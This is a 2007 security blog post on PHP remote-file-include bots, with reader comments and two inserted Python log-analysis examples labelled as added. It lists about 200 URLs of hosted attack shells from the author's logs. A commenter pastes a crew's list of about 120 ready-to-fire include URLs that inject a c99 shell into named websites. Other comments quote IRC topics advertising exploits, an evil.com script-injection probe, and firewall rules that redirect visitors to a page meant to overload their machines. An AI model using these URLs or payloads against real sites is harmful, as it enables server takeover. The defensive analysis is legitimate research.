PHP Include Robots
I’ve been toying around quite a bit with robots that attempt to exploit the site in various ways. I’ve been seeing an interesting shift: robots are moving away from direct exploitation until they have detected that the target is actually exploitable. That is interesting because it reduces the risk (for the bot operator) of someone just connecting to the script, downloading it and connecting to the controlling IRC servers. Here’s the list I got in today’s log file (please use extreme caution when viewing these - they are intentionally hostile in unknown ways):
http://2zero.by.ru/bot/echo.txt
http://38.99.89.50/.r/echo.txt
http://38.99.89.50/echo.txt
http://59.25.189.83/~upload/tt
http://66.235.205.131/echo
http://72.29.94.218/scr/evl.txt
http://80.86.105.122/echo.txt
http://afcomdfw.org/echo
http://albapower.de/id.txt
http://aldy.deep-ice.com/99.txt
http://aldy.deep-ice.com/mitra/echo.txt
http://aldy.ifastnet.com/xpl/echo.txt
http://alienr0x.by.ru/.spreag.txt
http://alienr0x.by.ru/r57.txt
http://andravarldar.se/cmd
http://arva.medusanetwork.com/echo.txt
http://az.co.cz/foto/c9.txt
http://b4ngs4t.com/echo
http://bacaplume.free.fr/manager/frontinc/services.txt
http://bavatuesdays.com//wp-content/plugins/wordtube/n00gr00d.txt
http://bb.domaindlx.com/armee/x.txt
http://br.geocities.com/darkteam4ever/echo.txt
http://br.geocities.com/porfook/engine.txt
http://bristoloakpaintballclub.com/calendar/calendar/includes/js/.,/.,/.,/test.txt
http://buceta.789mb.com/cmd1.txt
http://busca.uol.com.br/uol/index.html
http://bwlist.altervista.org/stringa.txt
http://chireo.info/n00gr00d.txt
http://clubmusic.caucasus.net/f22.txt
http://cmdfile.ifastnet.com/cmd/57.txt
http://cmdfile.ifastnet.com/cmd/a.txt
http://coccor0x.altervista.org/response.txt
http://d3prive.my-place.us/id.txt
http://d4rk4ir.altervista.org/r57.txt
http://dandorohoi.0catch.com/.r/echo.txt
http://deporpasto.com/portal/components/com_smo_ajax_shoutbox/languages/cmd.do
http://detroit.my-php.net/id.txt
http://dezzign.ru/echo
http://diving.actionpro.cz/galerie/tmp/vob.txt
http://dj.eliteradio.info/ech21o.txt
http://dj.eliteradio.info/echo.txt
http://drxrwx.ifastnet.com/57.txt
http://drxrwx.ifastnet.com/a.txt
http://dvl.by.ru/cmd/r57shell.txt
http://ebrain.netfast.org/r57
http://efardella.cinet.it/claroline/phpbb/id.txt
http://emi.faccat.br/coisasdowindovaio/freeman.txt
http://empore.altervista.org/rox.txt
http://equipexapadao.com/echo
http://faillurecorp.iespana.es/evals.txt
http://faillurecorp.iespana.es/id.txt
http://for-a.co.in/vulgar.htm
http://founder-poltekcrews-allnetwork.org/echo
http://freewebs.com/celinho/id.txt
http://freewebs.com/sak4w/r57.txt
http://geocities.com/surabayateam/vulgar.gif
http://gnuworld.evolink.ro/xxx/3739.echo.txt
http://h1.ripway.com/eownz/id.txt
http://h1.ripway.com/h4ck/echo.txt
http://h1.ripway.com/overcashxd/echo
http://h1.ripway.com/thc/id.txt
http://hacker.to.md/Qe3
http://hacker.to.md/mesin
http://hacker.to.md/x
http://happy.altervista.org/name.txt
http://heidik.org/y/id.txt
http://heritagelost.net/phpraid/cmd.txt
http://hokkian.dalnetz.biz/cibe.txt
http://ht-o.de/hto/images/echo
http://ikhlas.com.my/57.txt
http://ikhlas.com.my/cmd.txt
http://int0xic.by.ru/id.txt
http://jargo.phpnet.us/ilkom.txt
http://k52.jp/echo
http://kaoru-t.com/cache/echo.txt
http://kretenovich.phpnet.us/cmd.gif
http://l3to.by.ru/id.txt
http://lamerma.com.ve/n00gr00d.txt
http://lifechangerscc.com//catalog/includes/asd.txt
http://lifechangerscc.com//catalog/includes/cmd.txt
http://lppm.uns.ac.id/r57.txt
http://luis.infopiera.com/evl.txt
http://mabiographie.fr/httaccess
http://maxdemon.1sthost.org/docs/robot.txt
http://members.lycos.co.uk/modelteam/echo.txt
http://mensagem.us/hack/echo
http://multiplex.netfast.org/stringa.txt
http://nainty.xlphp.net/c99.txt
http://napushenko.phpnet.us/evl.txt
http://nemecsek87.altervista.org/ciao.jpg
http://netbarg.com/admin/backups/id.txt
http://new.bacone.edu/mambo/help.txt
http://niigatakubota.co.jp/.defacer/.secret/echo
http://nikkeydetetives.com/over/echo
http://nocommercial.altervista.org/my/nc.txt
http://norman.webspacemania.com/id.txt
http://norman.webspacemania.com/r57.txt
http://nosaj.1sweethost.com/freeman.txt
http://nxlf.cn/1
http://offzinho.netfast.org/57
http://openl4b.altervista.org/CMD.txt
http://partyaccess.net/2007/components/com_extcalendar/echo
http://pasto.com/administrator/components/safe.txt
http://perdu.ch/cgi-bin/echo
http://portal.isara.fr/claro151grain/claroline/auth/ldap/…bl/…/stringa.txt
http://priv8.netfast.org/cmd/r57.gif
http://putogame.webspacemania.com/r57.txt
http://putogame.webspacemania.com/safe.txt
http://raz0r-sh4rks.org/id.txt
http://redza.t35.com/xpl/injek
http://reshack.ifastnet.com/xpl/xpl.txt
http://rizla2.interfree.it/p.txt
http://rootkay.by.ru/id.txt
http://rotaryclub-fulham.org//components/com_extcalendar/cmd.txt
http://rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://sanwall.info/echo.txt
http://scan.prohosts.org/echo.txt
http://serc.ilc.edu.tw/echo
http://site.netspace.pt/media/echo.php
http://sniffo.by.ru/SuPrEmO.txt
http://stip-city.org/evl.txt
http://suntikan.org/echo
http://sup3rskunk.interfree.it/c99.txt
http://sup3rskunk.interfree.it/o.txt
http://symboliclynx.com/images/a
http://tauzendmark.ro/.r/echo.txt
http://thebadfox.jeeran.com/c99.txt
http://thedivaslist.com/.r/echo.txt
http://thelostsummer.com/x.do
http://theoriginalista.altervista.org/unix/no.txt
http://topnlpsites.com/images/gif/echo.txt
http://tosa.altervista.org/stringa.txt
http://treo.palmtop.pl/klub/Cmd.txt
http://ulil.xlphp.net/msn/msn
http://va7in.phpnet.us/vhv
http://valdhano.phpnet.us/gfs
http://valdhano.phpnet.us/vhv
http://varmvaffel.no-ip.com/andy/c99.txt
http://vcsok.com/echo
http://vegeta.co.jp/echo
http://vh1.srt.com.cn/sewam/c99.txt
http://waou.altervista.org/r57.txt
http://woodshack.com/components/com_phpshop/shop_image/help/freeman.txt
http://www.247live7.com/diablocrew/cmd.txt
http://www.Leonard0.kit.net/echo.txt
http://www.activekitten.com//bitrix/updates/ciola.txt
http://www.apnic.net/index.html
http://www.article-website.co.uk/admin/backup/RipperzCrewz
http://www.asqbuffalo.org/backups/freeman.txt
http://www.bastardirc.net/scan5.txt
http://www.bewahrer-azeroth.de/phpraid//raid_lua/asd.txt
http://www.chv.ro/cache/0day
http://www.defi.isep.ipp.pt/~jaa/cache/a
http://www.dgsport.be/components/res.txt
http://www.eclypse.info/oche
http://www.ekin0x.com/r57.txt
http://www.equipexapadao.com//id.txt
http://www.equipexapadao.com/echo
http://www.equipexapadao.com/id.txt
http://www.esto.sky7.us/RipperzCrewz
http://www.esto.sky7.us/SECRET.c
http://www.facepi.com.br/cache/…/botnet/out2.txt
http://www.fena.nu//components/com_rsgallery/r57rex.txt
http://www.freewebs.com/alezinn/n00gr00d.txt
http://www.geocities.com/junlee_180/metro/yeyen.txt
http://www.geocities.com/kampusunika/lamercrew.txt
http://www.geocities.com/kharisma_usada_mustika/checkit.txt
http://www.gonfiabiligamespark.it/flash/r57.txt
http://www.gritservice.it/r57.txt
http://www.hanovercova.us/business/x.txt
http://www.himagara-unila.com/x.do
http://www.k1ll3rx.addr.com/id.txt
http://www.kebcomputer.com/cache/error.txt
http://www.kebcomputer.com/cache/tess.txt
http://www.kebcomputer.com/cache/tests.txt
http://www.kelserific.xpg.com.br/tool25.txt
http://www.kendera.com.br/mvk.txt
http://www.leonard0.kit.net/echo.txt
http://www.modulardepot.com/smallimages/help/freeman.txt
http://www.mvmedia.com/old/Cmd.txt
http://www.mydezent.de/dload/pdl-gfx/ciola.txt
http://www.panglimacollection.com/titid.gif
http://www.panglimacollection.com/titid.txt
http://www.phazethree.com/shoponline/images/CMD.txt
http://www.pic4.us/pic/wvj89367.gif
http://www.private-scan.kit.net/evl.txt
http://www.pronext.eu/help/a.txt
http://www.propgpq.uece.br/mdb/echo
http://www.raaness.no/a
http://www.rhino-invest.info/FIP/id.txt
http://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://www.stockgoeroe.com/main.txt
http://www.subway56.com/delivery/modules/maindisplay/id.txt
http://www.sunshinefalls.com/Templates/.m/string.jpg
http://www.t5kclan.com/echo
http://www.tarcisiobr.kit.net/echo.txt
http://www.telecom.conexlink.com/includes/cache_tpls/freeman.txt
http://www.the-esao.com/imag/stringa.txt
http://www.thedivaslist.com/.r/echo.txt
http://www.thegrumbleweeds.com/pubgal/freeman.txt
http://www.thelostsummer.com/x.do
http://www.thiaguinho.net/id.txt
http://www.trendsturm.de/catalog/includes/help/freeman.txt
http://www.triton.xpg.com.br/biscate.txt
http://www.ugurfotograf.com/resources/incoming/a.txt
http://www.velozbr.netfast.org/Cmd/r57.txt
http://www.vortex2.altervista.org/cmd.txt
http://www.wantme.ca/cache/.,/.,/.,/test.txt
http://www.webbmakaren.se/test/admin/img/help/cmd.txt
http://www.webbmakaren.se/test/admin/img/help/freeman.txt
http://www.wow-insomnia.com/images/cmd.txt
http://www.yotasurf.co.uk/coppermine/albums/CMD.TXT
http://www.yufa.spb.ru/modules/coppermine/include/main.txt
http://www1.greenpeace.org.hk/camp/id.txt
http://xmlstuff.ifastnet.com/cmd/cmdx.do
http://xoomer.alice.it/hackz/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/solo.php
http://xoomer.alice.it/uploadftp/r57rex.txt
http://xpl46.altervista.org/config.txt
http://xpls.my-place.us/own.txt
http://younes.by.ru/c99.txt
You’ll notice an awful lot of “echo” versions which (when still valid) return content like:
<? echo "1122548"; ?>
Apparently others have seen this as well, so it’s not just me. This is a shift in tactics that will no doubt have a big impact on the survivability of bot-nets, as they will be more difficult to detect. The only problem (for the bots) is that the numbers don’t appear to be dynamic, so the probe itself is still easy to fingerprint. It won’t take long to correct that, which will mean that seeing what the bots are doing will require honeypots. It’ll be interesting to see the bots evolve over time.
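The probes in the list above all share one shape: a query parameter whose value is an absolute URL to a remote file, usually with a trailing "?" (and in the newer kits "?=%00") tacked on. What follows is an added example, not code from the original post, of how a defender can pull those probes out of a combined-format access log, normalise the remote target and tally the hosts serving payloads. The log lines and the payload-a.invalid / payload-b.invalid hostnames in it are constructed placeholders, and the libwww-perl/Java user-agent check mirrors what a commenter further down this page reports seeing.

```python
"""Pull remote-file-include (RFI) probes out of a combined-format access log.

Added example, not code from the original post. The probe shape the post
describes: some query parameter carries an absolute URL to a remote file,
with a trailing "?" (and in newer kits "?=%00") appended so that anything
the vulnerable include() concatenates after it is disarmed.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Combined log format; we only use the request path, status and user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# User-agents a commenter on the post reports on nearly every one of these bots.
SCANNER_UA = re.compile(r"^(libwww-perl|Java)/", re.IGNORECASE)

# Constructed sample lines; the payload hosts are placeholder names, not real ones.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jun/2007:20:01:12 -0700] "GET /index.php?page=http://payload-a.invalid/echo.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [11/Jun/2007:20:01:13 -0700] "GET /index2.php?inhalt=http://payload-a.invalid/foto/c9.txt?=%00 HTTP/1.1" 200 512 "-" "Java/1.5.0_06"
198.51.100.7 - - [11/Jun/2007:20:02:40 -0700] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Jun/2007:20:03:01 -0700] "GET /gallery.php?id=http%3A%2F%2Fpayload-b.invalid%2Fsource.txt%3F&s=r HTTP/1.1" 404 210 "-" "Mozilla/4.0"
"""


def clean_target(value):
    """Strip the suffixes probes append; return (url, had_null_byte).

    A NUL byte (%00) truncated the include path in older PHP releases; a
    trailing "?" turns whatever the script appends into a harmless query string.
    """
    had_nul = "\x00" in value
    url = value.split("\x00", 1)[0]
    url = re.sub(r"\?=?$", "", url)
    return url, had_nul


def remote_include_targets(request_path):
    """Every query value that is an absolute URL, as (param, url, had_nul)."""
    query = urlsplit(request_path).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            url, had_nul = clean_target(value)
            hits.append((name, url, had_nul))
    return hits


def classify_line(line):
    """A finding dict for an RFI probe, or None for a non-matching or ordinary request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    targets = remote_include_targets(m["path"])
    if not targets:
        return None
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "targets": targets,
        "scanner_ua": bool(SCANNER_UA.match(m["ua"])),
    }


def scan_log(text):
    """All RFI findings in a log, in file order."""
    return [f for f in map(classify_line, text.splitlines()) if f]


def payload_hosts(findings):
    """Hosts serving include payloads, most frequent first: raw material for a blocklist."""
    hosts = Counter(urlsplit(url).hostname for f in findings for _, url, _ in f["targets"])
    return hosts.most_common()


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        for param, url, had_nul in f["targets"]:
            print(f"{f['ip']} status={f['status']} scanner_ua={f['scanner_ua']} "
                  f"param={param} target={url} nul={had_nul}")
    print("payload hosts:", payload_hosts(found))
```

Run it as a script to print the findings; the host tally is the kind of collection the comments below talk about feeding to a DNS blackhole or a firewall. The absolute-URL value is the signal that matters: a 404 still counts, since the bot probes paths it guessed from search engine results, and the %00 suffix mostly just dates the kit.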
June 11th, 2007 at 10:04 pm
I find a couple hundred attempts to load c99 PHP shells each and every day rifling through my domain logs. Usually they are in the form of a text file, or image, but in some cases the file does not even exist. It’s still a pain in the ass though.
June 12th, 2007 at 12:18 am
Here’s an interesting proposal:
If the bots submit a file which looks like this:
<? echo "<script src='http://evil.com/xss.js'></script>"; ?>
What do you do?
If you echo the content back, then you’ve just created yourself an XSS hole, but if you don’t echo it back, then you can’t find what the bot is doing.
And there is no way to emulate that kind of response without giving it so unlike a payload which checks databases or reads files, you have to let it do some damage.
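Following the dilemma the comment above raises (echo the fetched body back and you have an XSS hole; don't and you learn nothing), here is an added example, not code from the original post or its comments, of the middle path for a honeypot or a log reviewer: treat the fetched body as data, pull the marker out with a regex instead of executing it, only ever reply with a plain alphanumeric marker, and HTML-escape anything that reaches a report. The two probe bodies and the evil.invalid host are constructed for the example.

```python
"""Record what an RFI probe body asks for without executing or rendering it.

Added example, not code from the original post or its comments. The bodies
below are constructed: the first mirrors the '<? echo "1122548"; ?>' marker
the post shows, the second the script-injecting variant a commenter raises.
"""
import hashlib
import html
import re

# A bare probe is one PHP echo of a quoted literal and nothing else.
ECHO_MARKER_RE = re.compile(
    r"""^\s*<\?(?:php)?\s*echo\s*(["'])(?P<marker>[^"']*)\1\s*;\s*\?>\s*$""",
    re.IGNORECASE,
)
SCRIPT_TAG_RE = re.compile(r"<\s*script", re.IGNORECASE)

PROBE_MARKER = '<? echo "1122548"; ?>'
PROBE_XSS = """<? echo "<script src='http://evil.invalid/xss.js'></script>"; ?>"""


def analyse_probe_body(body):
    """Static look at a fetched probe: the string the bot will grep for, plus a fingerprint."""
    m = ECHO_MARKER_RE.match(body)
    return {
        "kind": "echo-marker" if m else "other",
        "marker": m["marker"] if m else None,
        "contains_script": bool(SCRIPT_TAG_RE.search(body)),
        "sha256": hashlib.sha256(body.encode("utf-8")).hexdigest(),
        "length": len(body),
    }


def safe_reply(result):
    """Marker a honeypot may echo back verbatim: only a plain alphanumeric token, never markup."""
    marker = result["marker"]
    return marker if marker and marker.isalnum() else None


def render_for_report(body):
    """The only form a probe body should take inside an HTML report."""
    return html.escape(body, quote=True)


if __name__ == "__main__":
    for body in (PROBE_MARKER, PROBE_XSS):
        result = analyse_probe_body(body)
        print(result["kind"], "marker=", result["marker"],
              "script=", result["contains_script"], "sha256=", result["sha256"][:16])
        print("  reply:", safe_reply(result))
        print("  report:", render_for_report(body))
```

The numeric marker case is exactly the probe the post describes, and answering it with the bare digits tells the bot the site is "exploitable" without running anything, which is what makes a honeypot see the follow-up stage. The script-tag body gets no reply at all and is only ever stored as a hash and an escaped string.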
June 12th, 2007 at 6:20 pm
I see these in my log constantly. What I’ve been noticing more of are bots that are using HTTP REFERRERS from my own site. E.g. this was a pesky little thing for a minute until I blocked it with mod_security and a chain. An easy way with mod security is something like this which I’ve tested and currently implemented in the last 36 hours…
# Anyone coming in… Check them
SecFilterSelective REQUEST_URI "/index.php" chain
# If they’re injecting any http string redirect them…
SecFilterSelective REQUEST_URI ".*http://*" redirect:http://www.infiltrated.net/sorry.jpg
# Anyone circumventing garbage… redirect them too but send their PC into memory overload
SecFilterSelective REQUEST_URI ".*amp;do" redirect:http://www.infiltrated.net/stupidIE.html
# Anyone visiting this site… I didn’t refer you… If you want to pretend like I did… You too can get das boot and have your machine overloaded…
SecFilterSelective REQUEST_URI ".*item=35" chain
SecFilterSelective HTTP_REFERER "http://www.infiltrated.net/index.php?id=news&do=2&item=35" redirect:http://www.infiltrated.net/stupidIE.html
Now I noticed after these rules were in place, there were a few hosts trying to shift things around so I played with them until I got bored and created the mod_security+htaccess+personal_script to auto ipf em from connecting for a week…
Sup zeno and rs (if you read this) … sil
June 13th, 2007 at 6:09 am
ugh, check out irc.gigachat.net:6667 - referenced in a few of these php bots.
it’s NOTHING BUT .br ddos kiddies…
most popular channel is #DDOS :
* Topic is ‘#DDOs Amigos, SCAN’s Tudo aqui =] Quer Registros? Conquiste! CMD –> http://vnc2007.netfast.org/tr57.txt? / Mudanas estao para acontecer e novidades tambm..! http://www.milw0rm.com/author/53′
* Now talking in #aod
* Topic is ‘Angels of Death team: Neogenik - bapoz - mephisto - Darkrevenge | Xpl1: http://www.injek.cc/xpl/ | Xpl2: http://www.adek.org/xpl/ |cmd: http://andravarldar.se/cmd? | BotScan: http://AoD.tiagow.us/botscan.txt |News: DarkRevenge coding CMD for Sony PSP’
* Now talking in #wWw.cOm
* Topic is ‘CMD = http://cmdfile.ifastnet.com/cmd/a.txt? | XPL = http://www.adek.org/xpl/ - (@Scan)(Online) - Type - !scan | Don’t flood bot ! ‘
and so on, and so on….
*sigh*
June 13th, 2007 at 7:04 am
Addendum:
From a channel topic: http://www.xshqiptaretx.org/SHELLZ.txt
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
#WELCOME TO - ALBANIA.SECURITY.CLAN-
#
#PUBLIC VULNERABILLITY COLLECTION BY:
#
#”~A.S.C TEAM~”: Mafia_Boy, Anonymous, CoNtRoLLeR, A^L^B^A^N^I^A^^, NiNja, r0Y, W0rLD, MaSteR, Zetha, Zap, JaheeM!!!
#
#ENJOY - HAVE FUNN
#
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
#VuLNeRaBiLiTY SHELLZ By ALBANIA.SECURITY.CLAN STAFF @ IRC.FIER1.COM - IRC.UNIXHELL.COM - IRC.FIERICLAN.NET ) #
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
THE BEST WORLD OF A NEW STYLE OF LIFE 100% PUR ILLEGAL SHAKING
http://www.cenip.com.ar/demo/cenip/index.php?W=http://az.co.cz/foto/c9.txt?
http://www.stlofficespace.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.ldp.nu/Index2.php?page=http://az.co.cz/foto/c9.txt?
http://www.igaci.com.ar/main.php?id=http://az.co.cz/foto/c9.txt?
http://www.scubacat.nl/index.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.smigroup.it/service/reserved/home.php?page=http://az.co.cz/foto/c9.txt?
http://www.mtssro.cz/joomla/administrator/components/com_remository/admin.remository.phpmosConfig_absolute_path=http://az.co.cz/foto/c9.txt?
http://www.cantorelli.com/Services.php?dest=http://az.co.cz/foto/c9.txt?
http://www.arabischfueralle.de/index.php?action=http://az.co.cz/foto/c9.txt?
http://www.alleanzanazionaleroccasecca.it/giornale/directory/moduli/index.php?moduleName=http://az.co.cz/foto/c9.txt?
http://www.beathovens.de/main.php?dat=http://az.co.cz/foto/c9.txt?
http://www.bacultural.com/fr/home.php?module=http://az.co.cz/foto/c9.txt?
http://www2.rcenter.com.br/index2.php?idpx=http://az.co.cz/foto/c9.txt?
http://www.ixoxrwma.gr/index.php?lang=http://az.co.cz/foto/c9.txt?
http://www.nipponnews.net/contact.php?ln=http://az.co.cz/foto/c9.txt?
http://www.spoma.com/index.php?stranka=http://az.co.cz/foto/c9.txt?
http://www.acquistoonline.org/main.php?pag=http://az.co.cz/foto/c9.txt?
http://www.fausernet.novara.it/~itisleon/2005/indice.php?link=http://az.co.cz/foto/c9.txt?
http://www.dce.ufc.br/pagina.php?arquivo=http://az.co.cz/foto/c9.txt?
http://www.maber.co.kr/main.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.holoscapital.com.ar/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.dntar.ro/index.php?location=http://az.co.cz/foto/c9.txt?
http://www.impulsa.info/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.oratv.org/show.php?page=http://az.co.cz/foto/c9.txt?
http://www.kvazar.com.ua/main.php?p=http://az.co.cz/foto/c9.txt?
http://www.svtharde5.nl/index.php?&item=http://az.co.cz/foto/c9.txt?
http://www.mohtagin.net/script/greats/index.php?get=http://az.co.cz/foto/c9.txt?
http://www.buffetcenter.com.br/principal/principal.php?principal=http://az.co.cz/foto/c9.txt?
http://www.roseimoveis.com.br/internas.php?modo=http://az.co.cz/foto/c9.txt?
http://www.marasport.ca/main.php/main.php?section=http://az.co.cz/foto/c9.txt?
http://www.feneo.com/links/info.php?page=http://az.co.cz/foto/c9.txt?
http://www.northtrading.com.ar/spa/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.sma.df.gob.mx/educambiental/index.php?op=http://az.co.cz/foto/c9.txt?
http://www.laopinionhgo.com/index.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.meupixel.com/index.php?secao=http://az.co.cz/foto/c9.txt?
http://www.hlm2u.biz/main.php?p=http://az.co.cz/foto/c9.txt?
http://www.proteg.net/index.php?l1=http://az.co.cz/foto/c9.txt?
http://www.newstalk650.com/yourcityyourvote/index.php?right=http://az.co.cz/foto/c9.txt?
http://www.informaticasim.net/base.php?id=http://az.co.cz/foto/c9.txt?
http://www.robertbue.net/index.php?side=http://az.co.cz/foto/c9.txt?
http://www.holistic.com.br/daniel/index.php?pg=http://az.co.cz/foto/c9.txt?
http://www.stormspear.com/start.php?page=http://az.co.cz/foto/c9.txt?
http://www.interights.org/page.php?dir=http://az.co.cz/foto/c9.txt?
http://www.jhchemi.co.kr/main.php?goFile=http://az.co.cz/foto/c9.txt?
http://carnauba.cpamn.embrapa.br/qasap/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.prudenmax.com.br/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.powerrex.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.granada.sk/tangoklub/index.php?content=http://az.co.cz/foto/c9.txt?
http://www.urbanainmobiliaria.com.ar/pagina.php?medio=http://az.co.cz/foto/c9.txt?
http://www.membran.net/db_php_eng/index.php?action=http://az.co.cz/foto/c9.txt?
http://www.damianbenetucci.com.ar/damian/photo.php?section=http://az.co.cz/foto/c9.txt?
http://www.powerrex.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.granada.sk/tangoklub/index.php?content=http://az.co.cz/foto/c9.txt?
http://www.urbanainmobiliaria.com.ar/pagina.php?medio=http://az.co.cz/foto/c9.txt?
http://www.membran.net/db_php_eng/index.php?action=http://az.co.cz/foto/c9.txt?
http://www.damianbenetucci.com.ar/damian/photo.php?section=http://az.co.cz/foto/c9.txt?
http://www.spyro.info/sumo/main.php?section=http://az.co.cz/foto/c9.txt?
http://www.actiu.com/new05/home/home.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.alhourriah.org/print.php?page=http://az.co.cz/foto/c9.txt?
http://www.beeethoven.de/index.php?site=http://az.co.cz/foto/c9.txt?
http://www.ammin.uniss.it/nucleodivalutazione/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.oleriny.cz/info.php?co=http://az.co.cz/foto/c9.txt?
http://www.aerospool.sk/no100/index.php?str=http://az.co.cz/foto/c9.txt?
http://www.vanherkkaas.nl/shop.php?middle=http://az.co.cz/foto/c9.txt?
http://www.bgteam.co.kr/bbs_free.php?page=http://az.co.cz/foto/c9.txt?
http://www.saudeclass.com.br/default.php?lnk=http://az.co.cz/foto/c9.txt?
http://www.vodnanskaryba.eu/www/index.php?middle=http://az.co.cz/foto/c9.txt?
http://www.lyshaus.com/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.gginsam.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.gobest.idv.tw/index.php3F/archives/38SQLSERVER.html=http://az.co.cz/foto/c9.txt?
http://www.todopescajunin.com.ar/index.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.filharmonia.zabrze.pl/page.php?id=http://az.co.cz/foto/c9.txt?
http://www.toolscope.com/main.php?section=http://az.co.cz/foto/c9.txt?
http://www.wilka.pl/main.php?s=http://az.co.cz/foto/c9.txt?
http://www.ccpc.org.ve/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.eminemlounge.com/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.jak.netonline.ch/index.php?main=http://az.co.cz/foto/c9.txt?
http://www.cevolved.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.tecnicaweb.es/contenido.php?a=http://az.co.cz/foto/c9.txt?
http://www.hchheren9.nl/index2.php?phppage=http://az.co.cz/foto/c9.txt?
http://www.rgarden.com/vitalize/index.php?showpage=http://az.co.cz/foto/c9.txt?
http://www.shoto.nl/ko/layout.php?page=http://az.co.cz/foto/c9.txt?
http://www.lingera.ch/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.rydebacksrf.se/www/live.php?action=http://az.co.cz/foto/c9.txt?
http://www.inverigohotel.it/main.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.mimmediaevent.nl/php/template.php?showPage=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.maureensherbondy.com/index.php?url=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.sager1.de/sebastian/index.php?site=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.jonshpk.com/shqip.php?kat=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.globosaude.com.br/index1.php?pagina=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.vein.hu/www/intezetek/fdsz/szak_szerv/ulesek/generate.php?ev=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.satelliterecords.com/live/index.php?dept=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.unipanamericana.edu.co/index.php?pag=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.eurooknattk.cz/nove/ne/index1.php?adresa=http://az.co.cz/foto/c9.txt?
http://www.3i5i.de/blank.php?path=http://az.co.cz/foto/c9.txt?
http://www.tronix.nl/print.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.vein.hu/www/intezetek/koz_tan/test_ulesek/generate.php?ev=http://az.co.cz/foto/c9.txt?
http://www.readaboutstuff.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.goldmarket.ro/ro/start.php?pag=http://az.co.cz/foto/c9.txt?
http://www.paulinazamora.com/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.weblampjes.nl/weblampjes/lamp/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.allantiquity.com/index.php?page2=http://az.co.cz/foto/c9.txt?
http://www.imspeople.net/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.valenza.it/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.entertainmenthardware.com/Rentals/main.php?script=http://az.co.cz/foto/c9.txt?
http://www.gerryweberag.de/investorrelations.php?lang=http://az.co.cz/foto/c9.txt?
http://www.theimagecians.com/ara/index_ar.php?page=http://az.co.cz/foto/c9.txt?
http://www.ablopesukarhu.com/main.php?sivu=http://az.co.cz/foto/c9.txt?
http://www.achplv.sk/index.php?str=http://az.co.cz/foto/c9.txt?
http://www.idrate.net/index.php?goto=http://az.co.cz/foto/c9.txt?
http://www.helenandthepoorboys.de/galerien/show.php?galnr=http://az.co.cz/foto/c9.txt?
http://www.ezindus.com/main.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.jungo8949.co.kr/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.italyum.com/recipes/recipe.php?recipe=http://az.co.cz/foto/c9.txt?
